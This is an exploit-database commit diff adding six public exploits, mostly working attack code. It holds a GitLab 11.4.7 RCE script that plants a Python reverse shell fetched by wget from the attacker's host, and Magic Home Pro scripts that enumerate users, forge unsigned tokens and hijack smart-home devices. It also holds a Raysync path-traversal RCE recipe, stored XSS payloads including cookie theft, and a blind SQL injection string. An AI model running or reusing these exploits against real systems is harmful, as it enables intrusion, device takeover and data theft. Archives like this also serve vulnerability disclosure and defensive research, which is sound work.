DB: 2020-12-17

6 changes to exploits/shellcodes

Tibco ObfuscationEngine 5.11 - Fixed Key Password Decryption

Adobe (Multiple Products) - XML Injection File Content Disclosure
GitLab 11.4.7 - Remote Code Execution (Authenticated)
Grav CMS 1.6.30 Admin Plugin 1.9.18 - 'Page Title' Persistent Cross-Site Scripting
Raysync 3.3.3.8 - RCE
Magic Home Pro 1.5.1 - Authentication Bypass
PrestaShop ProductComments 4.2.0 - 'id_products' Time Based Blind SQL Injection
Seotoaster 3.2.0 - Stored XSS on Edit page properties

exploits/android/webapps/49266.py

@@ -0,0 +1,292 @@
+# Exploit Title: Magic Home Pro 1.5.1 - Authentication Bypass 
+# Google Dork: NA
+# Date: 22 October 2020
+# Exploit Author: Victor Hanna (Trustwave SpiderLabs)
+# Author Github Page: https://9lyph.github.io/CVE-2020-27199/
+# Vendor Homepage: http://www.zengge.com/appkzd
+# Software Link: https://play.google.com/store/apps/details?id=com.zengge.wifi&hl=en
+# Version: 1.5.1 (REQUIRED)
+# Tested on: Android 10
+
+## Enumeration ##
+
+import requests
+import json
+import os
+from colorama import init
+from colorama import Fore, Back, Style
+import re
+
+'''
+1. First Stage Authentication
+2. Second Stage Enumerate
+3. Third Stage Remote Execute
+'''
+
+global found_macaddresses
+found_macaddresses = []
+global outtahere
+outtahere = ""
+q = "q"
+global token
+
+
+def turnOn(target, token):
+
+    urlOn = "https://wifij01us.magichue.net/app/sendCommandBatch/ZG001"
+    array = {
+        "dataCommandItems":[
+            {"hexData":"71230fa3","macAddress":target}
+        ]
+    }
+    data = json.dumps(array)
+    headersOn = {
+        "User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)",
+        "Accept-Language": "en-US",
+        "Accept": "application/json", 
+        "Content-Type": "application/json; charset=utf-8",
+        "token":token,
+        "Host": "wifij01us.magichue.net",
+        "Connection": "close",
+        "Accept-Encoding": "gzip, deflate"
+    }
+    print (Fore.WHITE + "[+] Sending Payload ...")
+    response = requests.post(urlOn, data=data, headers=headersOn)
+    if response.status_code == 200:
+        if "true" in response.text:
+            print (Fore.GREEN + "[*] Endpoint " + Style.RESET_ALL + f"{target}" + Fore.GREEN + " Switched On")
+        else:
+            print (Fore.RED + "[-] Failed to switch on Endpoint " + Style.RESET_ALL + f"{target}")
+
+def turnOff(target, token):
+
+    urlOff = "https://wifij01us.magichue.net/app/sendCommandBatch/ZG001"
+    array = {
+        "dataCommandItems":[
+            {"hexData":"71240fa4","macAddress":target}
+        ]
+    }
+    data = json.dumps(array)
+    headersOff = {
+        "User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)",
+        "Accept-Language": "en-US",
+        "Accept": "application/json", 
+        "Content-Type": "application/json; charset=utf-8",
+        "token":token,
+        "Host": "wifij01us.magichue.net",
+        "Connection": "close",
+        "Accept-Encoding": "gzip, deflate"
+    }
+    print (Fore.WHITE + "[+] Sending Payload ...")
+    response = requests.post(urlOff, data=data, headers=headersOff)
+    if response.status_code == 200:
+        if "true" in response.text:
+            print (Fore.GREEN + "[*] Endpoint " + Style.RESET_ALL + f"{target}" + Fore.GREEN + " Switched Off")
+        else:
+            print (Fore.RED + "[-] Failed to switch on Endpoint " + Style.RESET_ALL + f"{target}")
+
+def lighItUp(target, token):
+
+    outtahere = ""
+    q = "q"
+    if len(str(target)) < 12:
+        print (Fore.RED + "[!] Invalid target" + Style.RESET_ALL)
+    elif re.match('[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}$', target.lower()):
+        while outtahere.lower() != q.lower():
+            if outtahere == "0":
+                turnOn(target, token)
+            elif outtahere == "1":
+                turnOff(target, token)
+            outtahere = input(Fore.BLUE + "ON/OFF/QUIT ? (0/1/Q): " + Style.RESET_ALL)
+
+def Main():
+    urlAuth = "https://wifij01us.magichue.net/app/login/ZG001"
+
+    data = {
+        "userID":"<Valid Registered Email/Username>",
+        "password":"<Valid Registered Password>",
+        "clientID":""
+    }
+
+    headersAuth = {
+        "User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)",
+        "Accept-Language": "en-US",
+        "Accept": "application/json", 
+        "Content-Type": "application/json; charset=utf-8",
+        "Host": "wifij01us.magichue.net",
+        "Connection": "close",
+        "Accept-Encoding": "gzip, deflate"
+    }
+
+    # First Stage Authenticate
+
+    os.system('clear')
+    print (Fore.WHITE + "[+] Authenticating ...")
+    response = requests.post(urlAuth, json=data, headers=headersAuth)
+    resJsonAuth = response.json()
+    token = (resJsonAuth['token'])
+
+    # Second Stage Enumerate
+
+    print (Fore.WHITE + "[+] Enumerating ...")
+    macbase = "C82E475DCE"
+    macaddress = []
+    a = ["%02d" % x for x in range(100)]
+    for num in a:
+        macaddress.append(macbase+num)
+
+    with open('loot.txt', 'w') as f:
+        for mac in macaddress:
+            urlEnum = "https://wifij01us.magichue.net/app/getBindedUserListByMacAddress/ZG001"
+            params = {
+                "macAddress":mac
+            }
+
+            headersEnum = {
+                "User-Agent": "Magic Home/1.5.1(ANDROID,9,en-US)",
+                "Accept-Language": "en-US",
+                "Content-Type": "application/json; charset=utf-8",
+                "Accept": "application/json",
+                "token": token,
+                "Host": "wifij01us.magichue.net",
+                "Connection": "close",
+                "Accept-Encoding": "gzip, deflate"
+            }
+
+            response = requests.get(urlEnum, params=params, headers=headersEnum)
+            resJsonEnum = response.json()
+            data = (resJsonEnum['data'])
+            if not data:
+                pass
+            elif data:
+                found_macaddresses.append(mac)
+                print (Fore.GREEN + "[*] MAC Address Identified: " + Style.RESET_ALL + f"{mac}" + Fore.GREEN + f", User: " + Style.RESET_ALL + f"{(data[0]['userName'])}, " + Fore.GREEN + "Unique ID: " + Style.RESET_ALL + f"{data[0]['userUniID']}, " + Fore.GREEN + "Binded ID: " + Style.RESET_ALL + f"{data[0]['bindedUniID']}")
+                f.write(Fore.GREEN + "[*] MAC Address Identified: " + Style.RESET_ALL + f"{mac}" + Fore.GREEN + f", User: " + Style.RESET_ALL + f"{(data[0]['userName'])}, " + Fore.GREEN + "Unique ID: " + Style.RESET_ALL + f"{data[0]['userUniID']}, " + Fore.GREEN + "Binded ID: " + Style.RESET_ALL + f"{data[0]['bindedUniID']}\n")
+            else:
+                print (Fore.RED + "[-] No results found!")
+                print(Style.RESET_ALL)
+
+        if not found_macaddresses:
+            print (Fore.RED + "[-] No MAC addresses retrieved")
+        elif found_macaddresses:
+            attackboolean = input(Fore.BLUE + "Would you like to Light It Up ? (y/N): " + Style.RESET_ALL)
+            if (attackboolean.upper() == 'Y'):
+                target = input(Fore.RED + "Enter a target device mac address: " + Style.RESET_ALL)
+                lighItUp(target, token)
+            elif (attackboolean.upper() == 'N'):
+                print (Fore.CYAN + "Sometimes, belief isn’t about what we can see. It’s about what we can’t."+ Style.RESET_ALL)
+            else:
+                print (Fore.CYAN + "The human eye is a wonderful device. With a little effort, it can fail to see even the most glaring injustice." + Style.RESET_ALL)
+
+if __name__ == "__main__":
+    Main()
+
+## Token Forging ##
+
+#!/usr/local/bin/python3
+
+import url64
+import requests
+import json
+import sys
+import os
+from colorama import init
+from colorama import Fore, Back, Style
+import re
+import time
+from wsgiref.handlers import format_date_time
+from datetime import datetime
+from time import mktime
+
+now = datetime.now()
+stamp = mktime(now.timetuple())
+
+'''
+HTTP/1.1 200
+Server: nginx/1.10.3
+Content-Type: application/json;charset=UTF-8
+Connection: close
+
+"{\"code\":0,\"msg\":\"\",\"data\":{\"webApi\":\"wifij01us.magichue.net/app\",\"webPathOta\":\"http:\/\/wifij01us.magichue.net\/app\/ota\/download\",\"tcpServerController\":\"TCP,8816,ra8816us02.magichue.net\",\"tcpServerBulb\":\"TCP,8815,ra8815us02.magichue.net\",\"tcpServerControllerOld\":\"TCP,8806,mhc8806us.magichue.net\",\"tcpServerBulbOld\":\"TCP,8805,mhb8805us.magichue.net\",\"sslMqttServer\":\"ssl:\/\/192.168.0.112:1883\",\"serverName\":\"Global\",\"serverCode\":\"US\",\"userName\":\"\",\"userEmail\":\"\",\"userUniID\":\"\"},\"token\":\"\"}"
+'''
+
+def Usage():
+    print (f"Usage: {sys.argv[0]} <username> <unique id>")
+
+def Main(user, uniqid):
+    os.system('clear')
+    print ("[+] Encoding ...")
+    print ("[+] Bypass header created!")
+    print ("HTTP/1.1 200")
+    print ("Server: nginx/1.10.3")
+    print ("Date: "+str(format_date_time(stamp))+"")
+    print ("Content-Type: application/json;charset=UTF-8")
+    print ("Connection: close\r\n\r\n")
+
+    jwt_header = '{"typ": "JsonWebToken","alg": "None"}'
+    jwt_data = '{"userID": "'+user+'", "uniID": "'+uniqid+'","cdpid": "ZG001","clientID": "","serverCode": "US","expireDate": 1618264850608,"refreshDate": 1613080850608,"loginDate": 1602712850608}'
+    jwt_headerEncoded = url64.encode(jwt_header.strip())
+    jwt_dataEncoded = url64.encode(jwt_data.strip())
+    jwtcombined = (jwt_headerEncoded.strip()+"."+jwt_dataEncoded.strip()+".")
+    print ("{\"code\":0,\"msg\":\"\",\"data\":{\"webApi\":\"wifij01us.magichue.net/app\",\"webPathOta\":\"http://wifij01us.magichue.net/app/ota/download\",\"tcpServerController\":\"TCP,8816,ra8816us02.magichue.net\",\"tcpServerBulb\":\"TCP,8815,ra8815us02.magichue.net\",\"tcpServerControllerOld\":\"TCP,8806,mhc8806us.magichue.net\",\"tcpServerBulbOld\":\"TCP,8805,mhb8805us.magichue.net\",\"sslMqttServer\":\"ssl:\/\/192.168.0.112:1883\",\"serverName\":\"Global\",\"serverCode\":\"US\",\"userName\":\""+user+"\",\"userEmail\":\""+user+"\",\"userUniID\":\""+uniqid+"\"},\"token\":\""+jwtcombined+"\"}")
+
+if __name__ == "__main__":
+    if len(sys.argv) < 3:
+        Usage()
+    else:
+        Main(sys.argv[1], sys.argv[2])
+
+## Device Takeover PoC ##
+
+#!/usr/local/bin/python3
+
+import url64
+import requests
+import json
+import sys
+import os
+from colorama import init
+from colorama import Fore, Back, Style
+import re
+
+def Usage():
+    print (f"Usage: {sys.argv[0]} <attacker email> <target email> <target mac address> <target forged token>")
+
+def Main():
+
+    attacker_email = sys.argv[1]
+    target_email = sys.argv[2]
+    target_mac = sys.argv[3]
+    forged_token = sys.argv[4]
+
+    os.system('clear')
+    print (Fore.WHITE + "[+] Sending Payload ...")
+    url = "https://wifij01us.magichue.net/app/shareDevice/ZG001"
+
+    array = {"friendUserID":attacker_email, "macAddress":target_mac}
+
+    data = json.dumps(array)
+
+    headers = {
+        "User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)",
+        "Accept-Language": "en-US",
+        "Accept": "application/json", 
+        "Content-Type": "application/json; charset=utf-8",
+        "token":forged_token,
+        "Host": "wifij01us.magichue.net",
+        "Connection": "close",
+        "Accept-Encoding": "gzip, deflate"
+    }
+    
+    response = requests.post(url, data=data, headers=headers)
+    if response.status_code == 200:
+        if "true" in response.text:
+            print (Fore.GREEN + "[*] Target is now yours ... " + Style.RESET_ALL)
+        else:
+            print (Fore.RED + "[-] Failed to take over target !" + Style.RESET_ALL)
+
+if __name__ == "__main__":
+    if len(sys.argv) < 5:
+        Usage()
+    else:
+        Main()

exploits/linux/webapps/49265.txt

@@ -0,0 +1,25 @@
+# Exploit Title: Raysync 3.3.3.8 - RCE
+# Date: 04/10/2020
+# Exploit Author: XiaoLong Zhu
+# Vendor Homepage: www.raysync.io
+# Version: below 3.3.3.8
+# Tested on: Linux
+
+step1: run RaysyncServer.sh to build a web application on the local
+
+environment, set admin password to 123456 , which will be write to
+
+manage.db file.
+
+step2: curl "file=@manage.db" http://[raysync
+ip]/avatar?account=1&UserId=/../../../../config/manager.db
+
+to override remote manage.db file in server.
+
+step3: login in admin portal with admin/123456.
+
+step4: create a normal file with all permissions in scope.
+
+step5: modify RaySyncServer.sh ,add arbitrary evil command.
+
+step6: trigger rce with clicking "reset" button

exploits/php/webapps/49264.txt

@@ -0,0 +1,45 @@
+# Exploit Title: Grav CMS 1.6.30 Admin Plugin 1.9.18 - 'Page Title' Persistent Cross-Site Scripting
+# Date: 13-12-2020
+# Exploit Author: Sagar Banwa
+# Vendor Homepage: https://getgrav.org/
+# Software Link: https://getgrav.org/downloads
+# Version: Grav v1.6.30 - Admin v1.9.18
+# Tested on: Windows 10/Kali Linux
+# Contact: https://www.linkedin.com/in/sagarbanwa/
+
+Step to reproduce :
+
+1) log in to the grav-admin panel 
+2) Go to Pages 
+3) Click on Add 
+4) It will ask to Add Page
+5) fill the following details as below 
+   Page Title : <script>alert(1337)</script>
+   Folder Name : sagar_Banwa
+   Parent Page : /(root)
+   Page Template : Default
+   Value : yes
+6) click on the Save button 
+7) now Click on Pages again.
+8) your page name will be listed as <script>alert(1337)</script>
+9) Now click on the eye button to see the XSS or you can simply go to http://127.0.0.1/grav-admin/ the XSS will pop-up 
+
+-------------------------------------
+   
+POST /grav-admin/admin/pages HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 230
+Origin: http://127.0.0.1
+Connection: close
+Referer: http://127.0.0.1/grav-admin/admin/pages
+Cookie: grav-site-a4a23f1-admin=ehrcji8qpnu8e50r839r4oe2on; grav-site-a4a23f1=u5438b49fft2b5d7610a53ne1d; grav-tabs-state={%22tab-options.routes.registration.Security%22:%22data.Security%22%2C%22tab-content.options.advanced%22:%22data.content%22}
+Upgrade-Insecure-Requests: 1
+
+data%5Btitle%5D=%3Cscript%3Ealert%281337%29%3C%2Fscript%3E&data%5Bfolder%5D=sagar_banwa&data%5Broute%5D=%2F&data%5Bname%5D=default&data%5Bvisible%5D=1&data%5Bblueprint%5D=&task=continue&admin-nonce=d488c0d8bdaf2978d50f174942d5279f
+
+-----------------------------

exploits/php/webapps/49267.txt

@@ -0,0 +1,14 @@
+​# Exploit Title: PrestaShop ProductComments 4.2.0 - 'id_products' Time Based Blind SQL Injection
+# Date: 2020-12-15
+# Exploit Author: Frederic ADAM
+# Author contact: contact@fadam.eu
+# Vendor Homepage: https://www.prestashop.com
+# Software Link: https://github.com/PrestaShop/productcomments
+# Version: 4.2.0
+# Tested on: Debian 10
+# CVE : CVE-2020-26248
+
+http://localhost/index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=[SQL]
+
+Example:
+http://localhost/index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=(select*from(select(sleep(2)))a)

exploits/php/webapps/49268.txt

@@ -0,0 +1,29 @@
+# Exploit Title: Seotoaster 3.2.0 - Stored XSS on Edit page properties
+# Exploit Author: Hardik Solanki
+# Vendor Homepage: https://www.seotoaster.com/
+# Software Link: https://crm-marketing-automation-platforms.seotoaster.com/
+# Version: 3.2.0
+# Tested on Windows 10
+
+XSS ATTACK:
+Cross-site Scripting (XSS) is a client-side code injection attack. The
+attacker aims to execute malicious scripts in a web browser of the victim
+by including malicious code in a legitimate web page or web application.
+The actual attack occurs when the victim visits the web page or web
+application that executes the malicious code. The web page or web
+application becomes a vehicle to deliver the malicious script to the user’s
+browser. Vulnerable vehicles that are commonly used for Cross-site
+Scripting attacks are forums, message boards, and web pages that allow
+comments.
+
+XSS IMPACT:
+1: Steal the cookie
+2: User redirection to a malicious website
+
+Vulnerable Parameters: Edit page properties
+
+Steps to reproduce:
+1: Navigate to "https://localhost/" and log in with valid credentials.
+2: Then navigates/click on "Edit page properties".
+3: Add the payload "*"><script>alert(document.cookie)</script>*", on "Page header H1 tag" field and click on "Save Page" button. Page Saved succesfully.
+4: Hence XSS will get stored and trigger on the main home/main page.

exploits/ruby/webapps/49263.py

@@ -0,0 +1,262 @@
+# Exploit Title: GitLab 11.4.7 Authenticated Remote Code Execution (No Interaction Required)
+# Date: 15th December 2020
+# Exploit Author: Mohin Paramasivam (Shad0wQu35t)
+# Software Link: https://about.gitlab.com/
+# POC: https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/
+# Tested on: GitLab 11.4.7 CE
+# CVE : CVE-2018-19571 (SSRF),CVE-2018-19585 (CRLF)
+
+import requests
+import re
+import warnings
+from bs4 import BeautifulSoup
+import sys
+import base64
+import urllib
+from random_words import RandomWords
+import argparse
+import os
+import time
+
+
+
+
+parser = argparse.ArgumentParser(description='GitLab 11.4.7 Authenticated RCE')
+parser.add_argument('-U',help='GitLab Username')
+parser.add_argument('-P',help='Gitlab Password')
+parser.add_argument('-l',help='rev shell lhost')
+parser.add_argument('-p',help='rev shell lport ',type=int)
+args = parser.parse_args()
+
+
+username = args.U
+password = args.P
+lhost = args.l
+lport = args.p
+
+
+#Retrieve CSRF Token
+
+warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
+gitlab_url = "http://10.129.49.62:5080"
+request = requests.Session()
+print("[+] Retrieving CSRF token to submit the login form")
+time.sleep(1)
+page = request.get(gitlab_url+"/users/sign_in")
+html_content = page.text
+soup = BeautifulSoup(html_content,features="lxml")
+token = soup.findAll('meta')[16].get("content")
+
+
+print("[+] CSRF Token : "+token)
+time.sleep(1)
+
+
+#Login
+
+login_info ={
+            "authenticity_token": token,
+            "user[login]": username,
+            "user[password]": password,
+            "user[remember_me]": "0"
+}
+
+
+login_request = request.post(gitlab_url+"/users/sign_in",login_info)
+
+
+if login_request.status_code==200:
+	print("[+] Login Successful")
+	time.sleep(1)
+
+else:
+
+	print("Login Failed")
+	print(" ")
+	sys.exit()
+
+
+
+
+#Exploitation
+
+print("[+] Running Exploit")
+time.sleep(1)
+print("[+] Using IPV6 URL 'git://[0:0:0:0:0:ffff:127.0.0.1]:6379/test/ssrf.git' to bypass filter")
+time.sleep(1)
+
+ipv6_url = "git%3A%2F%2F%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A6379%2Ftest%2Fssrf.git"
+
+
+r = RandomWords()
+project_name = r.random_word()
+project_url = '%s/%s/'%(gitlab_url,username)
+
+print("[+] Creating Project")
+time.sleep(1)
+print("[+] Project Name : "+project_name)
+time.sleep(1)
+
+print("[+] Creating Python Reverse Shell")
+time.sleep(1)
+
+
+python_shell = 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("%s",%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'%(lhost,lport)
+
+
+os.system("touch shell.py")
+shell_file = open("shell.py","w")
+shell_file.write(python_shell)
+shell_file.close()
+
+
+print("[+] Reverse Shell Generated")
+time.sleep(1)
+
+print("[+] Start HTTP Server in current directory")
+
+
+print("Command : python3 -m http.server 80")
+time.sleep(2)
+
+http_server = raw_input("Continue (Y/N) : ")
+
+if (http_server=="N") or (http_server=="n"):
+	print("Start HTTP Server before running exploit")
+
+elif (http_server=="Y") or (http_server=="y"):
+
+	
+	
+	print("Run this script twice with options below to get SHELL!")
+	print("")
+	print("Option 1 : Download shell.py rev shell to server using wget")
+	print("Option 2 : Execute shell.py downloaded previously")
+
+	option = raw_input("Option (1/2) : ")
+
+
+	if option=="1":
+
+
+
+		reverse_shell= """\nmulti
+		 sadd resque:gitlab:queues system_hook_push
+		 lpush resque:gitlab:queue:system_hook_push "{\\"class\\":\\"GitlabShellWorker\\",\\"args\\":[\\"class_eval\\",\\"open(\\'|setsid wget http://%s/shell.py \\').read\\"],\\"retry\\":3,\\"queue\\":\\"system_hook_push\\",\\"jid\\":\\"ad52abc5641173e217eb2e52\\",\\"created_at\\":1513714403.8122594,\\"enqueued_at\\":1513714403.8129568}"
+		 exec
+		 exec
+		 exec\n""" %(lhost)
+		 
+		 
+		project_page = request.get(gitlab_url+"/projects/new")
+		html_content = project_page.text
+		soup = BeautifulSoup(html_content,features="lxml")
+		project_token = soup.findAll('meta')[16].get("content")
+		namespace_id = soup.find('input', {'name': 'project[namespace_id]'}).get('value')
+		urlencoded_token1 = project_token.replace("==","%3D%3D")
+		urlencoded_token_final = urlencoded_token1.replace("+","%2B")
+		
+
+		payload=b"utf8=%E2%9C%93&authenticity_token={}&project%5Bimport_url%5D={}{}&project%5Bci_cd_only%5D=false&project%5Bname%5D={}&project%5Bnamespace_id%5D={}&project%5Bpath%5D={}&project%5Bdescription%5D=&project%5Bvisibility_level%5D=0".format(urlencoded_token_final,ipv6_url,reverse_shell,project_name,namespace_id,project_name)
+
+
+
+
+
+
+		proxies = {
+			"http" : "http://127.0.0.1:8080",
+		     	"https" : "https://127.0.0.1:8080",
+			    }
+			    
+		cookies = {
+		    'sidebar_collapsed': 'false',
+		    'event_filter': 'all',
+		    'hide_auto_devops_implicitly_enabled_banner_1': 'false',
+		    '_gitlab_session':request.cookies['_gitlab_session'],
+		}
+
+		headers = {
+		    'Host': '10.129.49.31:5080',
+		    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
+		    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
+		    'Accept-Language': 'en-US,en;q=0.5',
+		    'Accept-Encoding': 'gzip, deflate',
+		    'Referer': 'http://10.129.49.31:5080/projects',
+		    'Content-Type': 'application/x-www-form-urlencoded',
+		    'Content-Length': '398',
+		    'Connection': 'close',
+		    'Upgrade-Insecure-Requests': '1',
+		}
+
+
+
+		#response = request.post('http://10.129.49.31:5080/projects',data=payload,proxies=proxies,cookies=cookies,headers=headers,verify=False)
+
+		response1 = request.post(gitlab_url+'/projects',data=payload,cookies=cookies,proxies=proxies,headers=headers,verify=False)
+		print("[+] Success!")
+		time.sleep(1)
+		print("[+] Run Exploit with Option 2")
+		
+		
+	elif option=="2":
+
+		reverse_shell= """\nmulti
+		 sadd resque:gitlab:queues system_hook_push
+		 lpush resque:gitlab:queue:system_hook_push "{\\"class\\":\\"GitlabShellWorker\\",\\"args\\":[\\"class_eval\\",\\"open(\\'|setsid python3 shell.py \\').read\\"],\\"retry\\":3,\\"queue\\":\\"system_hook_push\\",\\"jid\\":\\"ad52abc5641173e217eb2e52\\",\\"created_at\\":1513714403.8122594,\\"enqueued_at\\":1513714403.8129568}"
+		 exec
+		 exec
+		 exec\n"""
+		 
+
+
+
+		project_page = request.get(gitlab_url+"/projects/new")
+		html_content = project_page.text
+		soup = BeautifulSoup(html_content,features="lxml")
+		project_token = soup.findAll('meta')[16].get("content")
+		namespace_id = soup.find('input', {'name': 'project[namespace_id]'}).get('value')
+		urlencoded_token1 = project_token.replace("==","%3D%3D")
+		urlencoded_token_final = urlencoded_token1.replace("+","%2B")
+
+
+		payload=b"utf8=%E2%9C%93&authenticity_token={}&project%5Bimport_url%5D={}{}&project%5Bci_cd_only%5D=false&project%5Bname%5D={}&project%5Bnamespace_id%5D={}&project%5Bpath%5D={}&project%5Bdescription%5D=&project%5Bvisibility_level%5D=0".format(urlencoded_token_final,ipv6_url,reverse_shell,project_name,namespace_id,project_name)
+
+
+
+
+
+
+		proxies = {
+			"http" : "http://127.0.0.1:8080",
+		     	"https" : "https://127.0.0.1:8080",
+			    }
+			    
+		cookies = {
+		    'sidebar_collapsed': 'false',
+		    'event_filter': 'all',
+		    'hide_auto_devops_implicitly_enabled_banner_1': 'false',
+		    '_gitlab_session':request.cookies['_gitlab_session'],
+		}
+
+		headers = {
+		    'Host': '10.129.49.31:5080',
+		    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
+		    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
+		    'Accept-Language': 'en-US,en;q=0.5',
+		    'Accept-Encoding': 'gzip, deflate',
+		    'Referer': 'http://10.129.49.31:5080/projects',
+		    'Content-Type': 'application/x-www-form-urlencoded',
+		    'Content-Length': '398',
+		    'Connection': 'close',
+		    'Upgrade-Insecure-Requests': '1',
+		}
+
+
+
+		#response = request.post('http://10.129.49.31:5080/projects',data=payload,proxies=proxies,cookies=cookies,headers=headers,verify=False)
+
+		response1 = request.post(gitlab_url+'/projects',data=payload,cookies=cookies,proxies=proxies,headers=headers,verify=False)
+		print("[+] Success!")
+		time.sleep(1)
+		print("[+] Spawning Reverse Shell")

files_exploits.csv

@@ -11228,7 +11228,7 @@ id,file,description,date,author,type,platform,port
 49203,exploits/windows/local/49203.txt,"Rumble Mail Server 0.51.3135 - 'rumble_win32.exe' Unquoted Service Path",2020-12-07,"Mohammed Alshehri",local,windows,
 49205,exploits/windows/local/49205.txt,"Kite 1.2020.1119.0 - 'KiteService' Unquoted Service Path",2020-12-07,"Ismael Nava",local,windows,
 49211,exploits/windows/local/49211.ps1,"Druva inSync Windows Client 6.6.3 - Local Privilege Escalation (PowerShell)",2020-12-07,1F98D,local,windows,
-49221,exploits/multiple/local/49221.java,"Tibco ObfuscationEngine 5.11 - Fixed Key Password Decryption",2020-12-09,"Thomas Sluyter",local,multiple,
+49221,exploits/multiple/local/49221.java,"Tibco ObfuscationEngine 5.11 - Fixed Key Password Decryption",2020-12-09,"Tess Sluyter",local,multiple,
 49226,exploits/windows/local/49226.txt,"PDF Complete 3.5.310.2002 - 'pdfsvc.exe' Unquoted Service Path",2020-12-10,"Zaira Alquicira",local,windows,
 49248,exploits/windows/local/49248.txt,"System Explorer 7.0.0 - 'SystemExplorerHelpService' Unquoted Service Path",2020-12-14,"Mohammed Alshehri",local,windows,
 49259,exploits/linux/local/49259.c,"libbabl 0.1.62 - Broken Double Free Detection (PoC)",2020-12-15,"Carter Yagemann",local,linux,
@@ -40317,7 +40317,7 @@ id,file,description,date,author,type,platform,port
 42090,exploits/multiple/webapps/42090.txt,"KEMP LoadMaster 7.135.0.13245 - Persistent Cross-Site Scripting / Remote Code Execution",2017-05-30,SecuriTeam,webapps,multiple,
 42091,exploits/windows/webapps/42091.txt,"IBM Informix Dynamic Server / Informix Open Admin Tool - DLL Injection / Remote Code Execution / Heap Buffer Overflow",2017-05-30,SecuriTeam,webapps,windows,
 41849,exploits/php/webapps/41849.txt,"Jobscript4Web 4.5 - Authentication Bypass",2017-04-08,TurkCyberArmy,webapps,php,
-41855,exploits/xml/webapps/41855.sh,"Adobe (Multiple Products) - XML Injection File Content Disclosure",2017-04-07,"Thomas Sluyter",webapps,xml,8400
+41855,exploits/xml/webapps/41855.sh,"Adobe (Multiple Products) - XML Injection File Content Disclosure",2017-04-07,"Tess Sluyter",webapps,xml,8400
 41856,exploits/php/webapps/41856.txt,"MyClassifiedScript 5.1 - SQL Injection",2017-04-11,"Ihsan Sencan",webapps,php,
 41858,exploits/php/webapps/41858.txt,"Social Directory Script 2.0 - SQL Injection",2017-04-11,"Ihsan Sencan",webapps,php,
 41859,exploits/php/webapps/41859.txt,"FAQ Script 3.1.3 - 'category_id' SQL Injection",2017-04-11,"Ihsan Sencan",webapps,php,
@@ -43481,3 +43481,9 @@ id,file,description,date,author,type,platform,port
 49258,exploits/php/webapps/49258.txt,"Task Management System 1.0 - 'page' Local File Inclusion",2020-12-15,"İsmail BOZKURT",webapps,php,
 49260,exploits/php/webapps/49260.py,"Online Marriage Registration System (OMRS) 1.0 - Remote Code Execution (Authenticated)",2020-12-15,"Andrea Bruschi",webapps,php,
 49262,exploits/hardware/webapps/49262.py,"Cisco ASA 9.14.1.10 and FTD 6.6.0.1 - Path Traversal (2)",2020-12-15,Freakyclown,webapps,hardware,
+49263,exploits/ruby/webapps/49263.py,"GitLab 11.4.7 - Remote Code Execution (Authenticated)",2020-12-16,"Mohin Paramasivam",webapps,ruby,
+49264,exploits/php/webapps/49264.txt,"Grav CMS 1.6.30 Admin Plugin 1.9.18 - 'Page Title' Persistent Cross-Site Scripting",2020-12-16,"Sagar Banwa",webapps,php,
+49265,exploits/linux/webapps/49265.txt,"Raysync 3.3.3.8 - RCE",2020-12-16,james,webapps,linux,
+49266,exploits/android/webapps/49266.py,"Magic Home Pro 1.5.1 - Authentication Bypass",2020-12-16,"Victor Hanna",webapps,android,
+49267,exploits/php/webapps/49267.txt,"PrestaShop ProductComments 4.2.0 - 'id_products' Time Based Blind SQL Injection",2020-12-16,"Frederic ADAM",webapps,php,
+49268,exploits/php/webapps/49268.txt,"Seotoaster 3.2.0 - Stored XSS on Edit page properties",2020-12-16,"Hardik Solanki",webapps,php,